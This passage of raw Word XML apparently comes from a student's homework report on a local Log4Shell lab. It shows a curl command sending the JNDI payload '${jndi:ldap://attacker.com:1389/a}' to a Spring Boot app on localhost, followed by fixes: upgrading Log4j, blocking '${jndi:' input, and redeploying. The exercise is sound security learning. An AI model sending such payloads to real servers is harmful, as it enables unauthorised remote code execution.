            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="23544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4529" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4111952" cy="495543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A407ACD" w14:textId="29D6BAC5" w:rsidR="00C12E56" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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 xml:space="preserve">It gave me a warning in the first terminal : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E7D97" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00C12E56"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3D3C20" wp14:editId="58623F25">
            <wp:extent cx="5943600" cy="430530"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="210150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02566" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="430530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9E2FD" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62"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 xml:space="preserve">Seems like </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Spring Boot app is expecting a request parameter named **input**, but your curl command is sending a parameter named **message**.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443444F3" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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p>
    <w:p w14:paraId="1BD92689" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62"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 xml:space="preserve">Used this command on second terminal: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="009F01AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="4EA72E" w:themeColor="accent6"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://localhost:8080/log?input=\${jndi:ldap://attacker.com:1389/a}</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FFB6A96" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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p>
    <w:p w14:paraId="66460217" w14:textId="74A81A07" w:rsidR="00975B62" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62"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 xml:space="preserve">First terminal says: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64692BFE" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AA4E41" wp14:editId="379B41D9">
            <wp:extent cx="5943600" cy="234315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140066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66671" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="234315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD9B575" w14:textId="77777777" w:rsidR="00BF4223" w:rsidRPr="009F01AC" w:rsidRDefault="00BF4223"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p>
    <w:p w14:paraId="7E0880B0" w14:textId="31C9A55D" w:rsidR="00975B62" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62"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 xml:space="preserve">Second one says: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7777536E" w14:textId="68EE6E9F" w:rsidR="00975B62" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="00BF422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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E16A720" wp14:editId="57F1B1BF">
            <wp:extent cx="5094514" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179503529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35298" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5105986" cy="672070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B246FD7" w14:textId="77777777" w:rsidR="00BE68C4" w:rsidRPr="009F01AC" w:rsidRDefault="00BE68C4"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p>
    <w:p w14:paraId="7F3E9C92" w14:textId="7936B535" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00652BFC" w:rsidP="006A5C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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E71719" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51740CB3" w14:textId="6A0D981E" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="00975B6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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>YYEEAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29578DDC" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="00975B6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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D634DCD" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6D2C3A" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="009E0422">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b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F4EF0E" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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This means the curl command sent a malicious JNDI payload to the springboot application. On the first terminal it says received</w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">input which is the exact vulnerability!!!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531FFF60" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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 xml:space="preserve">So it is working and we were able to ‘attack’ the server!!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F9141" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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 xml:space="preserve">This simulates how attackers exploit the Log4Shell vulnerability: by sending a string that Log4j interprets as a JNDI lookup, triggering a remote class load </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the target system is misconfigured (which modern Java versions typically prevent by default now).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00401880" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="009E04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p>
    <w:p w14:paraId="7B7E652F" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0" w:rsidP="009E04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F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LEARNINGS: </w:t>
      </w:r>
      <w:r w:rsidR="00975B62" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00975B62" w:rsidRPr="00975B62">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> app uses a logging tool called Log4j. This tool takes messages you give it and writes them down (logs them).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29327AA5" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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75B62">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Log4Shell vulnerability is a weakness in Log4j where if someone sends a specially crafted message, Log4j tries to do something dangerous: it goes out to another computer (over the internet) to load and run some code it finds there.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00975B62">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This happens because Log4j “interprets” parts of the message as instructions to load code remotely — this is called a JNDI lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE95A6" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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75B62">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If your app or server is not protected properly, this lets an attacker run their own code on your server without permission.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> That is what we just simulated!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994329E" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="009E04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75B62">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>However, newer versions of Java and Log4j have added protections to stop this automatic loading of code, so just sending the message doesn’t always work anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5793E124" w14:textId="441B623A" w:rsidR="00975B62" w:rsidRPr="00975B62" w:rsidRDefault="00975B62" w:rsidP="009E042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360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This maps to MITRE ATT&amp;CK Tactic: Initial Access (TA0001) and Technique: Exploit Public-Facing Application (T1190).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC5718" w14:textId="77777777" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="00975B6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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB16BDD" w14:textId="10060B27" w:rsidR="00975B62" w:rsidRPr="009F01AC" w:rsidRDefault="00975B62" w:rsidP="00975B6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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Part 2: Defending Against Log4Shell (MITRE DEFEND)</w:t>
      </w:r>
      <w:r w:rsidR="0041296A" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apply Security Controls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946E963" w14:textId="77777777" w:rsidR="0041296A" w:rsidRPr="009F01AC" w:rsidRDefault="0041296A" w:rsidP="00975B6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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5638FC84" w14:textId="3CAE408B" w:rsidR="0041296A" w:rsidRPr="009F01AC" w:rsidRDefault="0041296A" w:rsidP="0041296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Update Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use secure version 2.17.0</w:t>
      </w:r>
      <w:r w:rsidR="001C4D3B" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C4D3B" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">– updated the file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EA23B" w14:textId="18E04DBB" w:rsidR="0041296A" w:rsidRPr="009F01AC" w:rsidRDefault="0041296A" w:rsidP="0041296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Add Input Validation in LogController.java to block JNDI patterns</w:t>
      </w:r>
      <w:r w:rsidR="001C4D3B" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A01307" w14:textId="4D9F0103" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">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 xml:space="preserve">Updated file to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC4B51" w14:textId="77777777" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Use @PostMapping instead of @GetMapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D57C78" w14:textId="77777777" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Accept input as a raw string body (@RequestBody) instead of a query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14252A08" w14:textId="121B62D4" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Add basic protection by detecting and blocking any string that tries to exploit Log4Shell using ${jndi:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC03FBF" w14:textId="57074DEA" w:rsidR="0041296A" w:rsidRPr="009F01AC" w:rsidRDefault="0041296A" w:rsidP="0041296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redeploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01709CF3" w14:textId="7AA3A716" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Cd log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBD81B" w14:textId="0DA07854" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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docker-compose down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57D409" w14:textId="673AFA70" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker-compose up –build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A9EE4" w14:textId="328856A8" w:rsidR="0041296A" w:rsidRPr="009F01AC" w:rsidRDefault="0041296A" w:rsidP="0041296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658EA162" w14:textId="528B9ADA" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Learnings: These steps helped protect a web application from a dangerous cybersecurity flaw Log4Shell. This vulnerability allows hackers to run their own code on systems remotely just by sending a specially crafted message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164544D" w14:textId="5FCFC818" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Updating Log4j to 2.17.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A328D5B" w14:textId="6885C4D9" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="001C4D3B" w:rsidP="001C4D3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080"/>
        <w:rPr>
